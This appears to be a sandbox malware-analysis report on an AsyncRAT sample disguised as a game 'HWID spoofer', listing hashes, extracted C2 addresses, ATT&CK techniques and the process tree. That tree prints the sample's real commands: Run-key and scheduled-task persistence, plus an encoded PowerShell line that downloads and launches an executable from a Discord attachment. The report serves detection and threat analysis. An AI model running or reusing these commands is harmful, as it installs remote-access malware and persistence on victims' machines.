asyncrat | 8744ee78fd8ec700b2d27545ad32e1e28f38f07c272d61bbcb8cff147cfb9bda

Analysis

max time kernel
135s
max time network
148s
platform
windows7_x64
resource
win7-20220414-en
submitted
11/07/2022, 12:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Hwid Spoofer Eac Rust Cleaner_nls.exe
Size

390KB
MD5

004dd8842386a105607735a890f57235
SHA1

9b1cb5e663cd342f1c44936c6db8540b6df0228b
SHA256

8744ee78fd8ec700b2d27545ad32e1e28f38f07c272d61bbcb8cff147cfb9bda
SHA512

95ac078482e9c3de3e0dc666322d2080a0a08443a0c5e2da848abcc45c5095e20dbd2e8cee6822eff13e4f98251e0e3b02c1ee4f70e0971d60eb56fa5f7de84c

Score

10^/10

asyncrat windows session manager windows system guard runtime persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Windows Session Manager

217.64.31.3:8808

217.64.31.3:8437

Mutex

Windows Session Manager

Attributes

delay
3
install
false
install_file
Windows Session Manager
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Windows System Guard Runtime

217.64.31.3:8808

217.64.31.3:8437

Mutex

Windows System Guard Runtime

Attributes

delay
3
install
false
install_file
Windows Session Manager
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 7 IoCs

rat

resource	yara_rule
behavioral1/memory/1372-81-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1372-80-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1372-82-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1372-83-0x000000000040D06E-mapping.dmp	asyncrat
behavioral1/memory/1372-86-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1372-88-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral1/memory/1784-99-0x0000000000A70000-0x0000000000A82000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1540	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
1344	111111111111111111111111_PROTECTED.EXE
1640	31.EXE
1784	SecurtyHealthService.exe

Loads dropped DLL 2 IoCs

pid	Process
1272	Hwid Spoofer Eac Rust Cleaner_nls.exe
1272	Hwid Spoofer Eac Rust Cleaner_nls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Session Manager = "C:\\Users\\Admin\\AppData\\Roaming\\Windows Session Manager\\Windows Session Manager.exe"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe"	SecurtyHealthService.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1344 set thread context of 1372	1344	111111111111111111111111_PROTECTED.EXE	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1564	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
696	powershell.exe
1540	powershell.exe
1540	powershell.exe
1540	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	696	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 1272 wrote to memory of 1344	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	28
PID 1272 wrote to memory of 1344	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	28
PID 1272 wrote to memory of 1344	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	28
PID 1272 wrote to memory of 1344	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	28
PID 1272 wrote to memory of 1640	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	29
PID 1272 wrote to memory of 1640	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	29
PID 1272 wrote to memory of 1640	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	29
PID 1272 wrote to memory of 1640	1272	Hwid Spoofer Eac Rust Cleaner_nls.exe	29
PID 1344 wrote to memory of 696	1344	111111111111111111111111_PROTECTED.EXE	30
PID 1344 wrote to memory of 696	1344	111111111111111111111111_PROTECTED.EXE	30
PID 1344 wrote to memory of 696	1344	111111111111111111111111_PROTECTED.EXE	30
PID 1344 wrote to memory of 696	1344	111111111111111111111111_PROTECTED.EXE	30
PID 1640 wrote to memory of 1540	1640	31.EXE	32
PID 1640 wrote to memory of 1540	1640	31.EXE	32
PID 1640 wrote to memory of 1540	1640	31.EXE	32
PID 1344 wrote to memory of 1016	1344	111111111111111111111111_PROTECTED.EXE	34
PID 1344 wrote to memory of 1016	1344	111111111111111111111111_PROTECTED.EXE	34
PID 1344 wrote to memory of 1016	1344	111111111111111111111111_PROTECTED.EXE	34
PID 1344 wrote to memory of 1016	1344	111111111111111111111111_PROTECTED.EXE	34
PID 1016 wrote to memory of 1564	1016	cmd.exe	36
PID 1016 wrote to memory of 1564	1016	cmd.exe	36
PID 1016 wrote to memory of 1564	1016	cmd.exe	36
PID 1016 wrote to memory of 1564	1016	cmd.exe	36
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1344 wrote to memory of 1372	1344	111111111111111111111111_PROTECTED.EXE	37
PID 1540 wrote to memory of 1784	1540	powershell.exe	38
PID 1540 wrote to memory of 1784	1540	powershell.exe	38
PID 1540 wrote to memory of 1784	1540	powershell.exe	38
PID 1540 wrote to memory of 1784	1540	powershell.exe	38

C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner_nls.exe
"C:\Users\Admin\AppData\Local\Temp\Hwid Spoofer Eac Rust Cleaner_nls.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1272
- C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE
  "C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1344
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Session Manager';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows Session Manager' -Value '"C:\Users\Admin\AppData\Roaming\Windows Session Manager\Windows Session Manager.exe"' -PropertyType 'String'
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:696
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /C schtasks /create /tn \Windows Session Manager /tr "C:\Users\Admin\AppData\Roaming\Windows Session Manager\Windows Session Manager.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1016
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn \Windows Session Manager /tr "C:\Users\Admin\AppData\Roaming\Windows Session Manager\Windows Session Manager.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:1564
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    #cmd
    3⤵
    PID:1372
- C:\Users\Admin\AppData\Roaming\31.EXE
  "C:\Users\Admin\AppData\Roaming\31.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQAzADAAMQAxADAANwA5ADYAMQAwADcANwA1ADUANQAzADAALwA5ADcANgAxADYAOQAwADYAMgA3ADAANQAwADAAOAA2ADQAMAAvADIAMwAyAC4AZQB4AGUAJwAsACAAPAAjAG0AaABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbgBwAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBuAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBlAGMAdQByAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwApACkAPAAjAHEAZQB6ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZQB1ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAGYAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAGUAYwB1AHIAdAB5AEgAZQBhAGwAdABoAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHUAZAB4ACMAPgA="
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe
      "C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:1784

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE

Filesize
87KB

MD5
346ba1d0419af2730de45a7da7fd7ef0

SHA1
2d4c79137a4a14f5b992dd91f053a83cdd382847

SHA256
ca74ada70ee8a46e7ed67ee7f5422370b31dd6e43d40970f79128556670e9d2c

SHA512
93fd893e10cbff156e80a9bbb5767deacc6e34f6c0c4e6d05db8c193fa297c6b5c301c681c2e2c536fa11440a6a1e11af2913e389b15dd0261fee9b7c223278a

Download Submit
C:\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE

Filesize
87KB

MD5
346ba1d0419af2730de45a7da7fd7ef0

SHA1
2d4c79137a4a14f5b992dd91f053a83cdd382847

SHA256
ca74ada70ee8a46e7ed67ee7f5422370b31dd6e43d40970f79128556670e9d2c

SHA512
93fd893e10cbff156e80a9bbb5767deacc6e34f6c0c4e6d05db8c193fa297c6b5c301c681c2e2c536fa11440a6a1e11af2913e389b15dd0261fee9b7c223278a

Download Submit
C:\Users\Admin\AppData\Roaming\31.EXE

Filesize
6KB

MD5
b25294704e5eee30e80257e134cffa6c

SHA1
01a891469fcd46aa36b8bf85cdfce3ed197d41d3

SHA256
1eb20f517c0c3630095eeb0553390e906ee423dad7b5082a7b29a0243972b180

SHA512
cdc9f6b6434421c250f37ec262dc792b935f82a2960a7dd961071533e579ef16cd9873dca030f5f35e9284150e084f5e7a11e81059385471b1ed47f4aea08143

Download Submit
C:\Users\Admin\AppData\Roaming\31.EXE

Filesize
6KB

MD5
b25294704e5eee30e80257e134cffa6c

SHA1
01a891469fcd46aa36b8bf85cdfce3ed197d41d3

SHA256
1eb20f517c0c3630095eeb0553390e906ee423dad7b5082a7b29a0243972b180

SHA512
cdc9f6b6434421c250f37ec262dc792b935f82a2960a7dd961071533e579ef16cd9873dca030f5f35e9284150e084f5e7a11e81059385471b1ed47f4aea08143

Download Submit
C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe

Filesize
4.2MB

MD5
2e8fde338b4195c8332e77ea64632a84

SHA1
1709e55228e76bcbe99adf44172f13a759b43425

SHA256
7fc2763bb77b71c737b4ea86568ba5e9fb3699f3ade7bb07069eae4734e7310b

SHA512
c9f5d98f0a12570a8dc7271beda408e2e401b4b51d3d7490691d461b2abc8fd97bf8cc8bb97d619864a78e1c9d6a9b0e045fcbb3a6eb16e2e70ba31113b192ec

Download Submit
C:\Users\Admin\AppData\Roaming\SecurtyHealthService.exe

Filesize
4.2MB

MD5
2e8fde338b4195c8332e77ea64632a84

SHA1
1709e55228e76bcbe99adf44172f13a759b43425

SHA256
7fc2763bb77b71c737b4ea86568ba5e9fb3699f3ade7bb07069eae4734e7310b

SHA512
c9f5d98f0a12570a8dc7271beda408e2e401b4b51d3d7490691d461b2abc8fd97bf8cc8bb97d619864a78e1c9d6a9b0e045fcbb3a6eb16e2e70ba31113b192ec

Download Submit
\Users\Admin\AppData\Roaming\111111111111111111111111_PROTECTED.EXE

Filesize
87KB

MD5
346ba1d0419af2730de45a7da7fd7ef0

SHA1
2d4c79137a4a14f5b992dd91f053a83cdd382847

SHA256
ca74ada70ee8a46e7ed67ee7f5422370b31dd6e43d40970f79128556670e9d2c

SHA512
93fd893e10cbff156e80a9bbb5767deacc6e34f6c0c4e6d05db8c193fa297c6b5c301c681c2e2c536fa11440a6a1e11af2913e389b15dd0261fee9b7c223278a

Download Submit
\Users\Admin\AppData\Roaming\31.EXE

Filesize
6KB

MD5
b25294704e5eee30e80257e134cffa6c

SHA1
01a891469fcd46aa36b8bf85cdfce3ed197d41d3

SHA256
1eb20f517c0c3630095eeb0553390e906ee423dad7b5082a7b29a0243972b180

SHA512
cdc9f6b6434421c250f37ec262dc792b935f82a2960a7dd961071533e579ef16cd9873dca030f5f35e9284150e084f5e7a11e81059385471b1ed47f4aea08143

Download Submit
memory/696-75-0x00000000703E0000-0x000000007098B000-memory.dmp

Filesize
5.7MB

Download
memory/696-90-0x00000000703E0000-0x000000007098B000-memory.dmp

Filesize
5.7MB

Download
memory/1272-54-0x0000000076171000-0x0000000076173000-memory.dmp

Filesize
8KB

Download
memory/1344-63-0x0000000000100000-0x000000000011C000-memory.dmp

Filesize
112KB

Download
memory/1372-88-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1372-86-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1372-82-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1372-80-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1372-77-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1372-78-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1372-81-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1540-95-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1540-76-0x0000000002684000-0x0000000002687000-memory.dmp

Filesize
12KB

Download
memory/1540-73-0x000007FEEE600000-0x000007FEEF023000-memory.dmp

Filesize
10.1MB

Download
memory/1540-85-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

Filesize
3.0MB

Download
memory/1540-74-0x000007FEEDAA0000-0x000007FEEE5FD000-memory.dmp

Filesize
11.4MB

Download
memory/1540-91-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/1540-96-0x000000000268B000-0x00000000026AA000-memory.dmp

Filesize
124KB

Download
memory/1640-67-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp

Filesize
8KB

Download
memory/1640-64-0x0000000000340000-0x0000000000348000-memory.dmp

Filesize
32KB

Download
memory/1784-97-0x0000000000230000-0x000000000065E000-memory.dmp

Filesize
4.2MB

Download
memory/1784-99-0x0000000000A70000-0x0000000000A82000-memory.dmp

Filesize
72KB

Download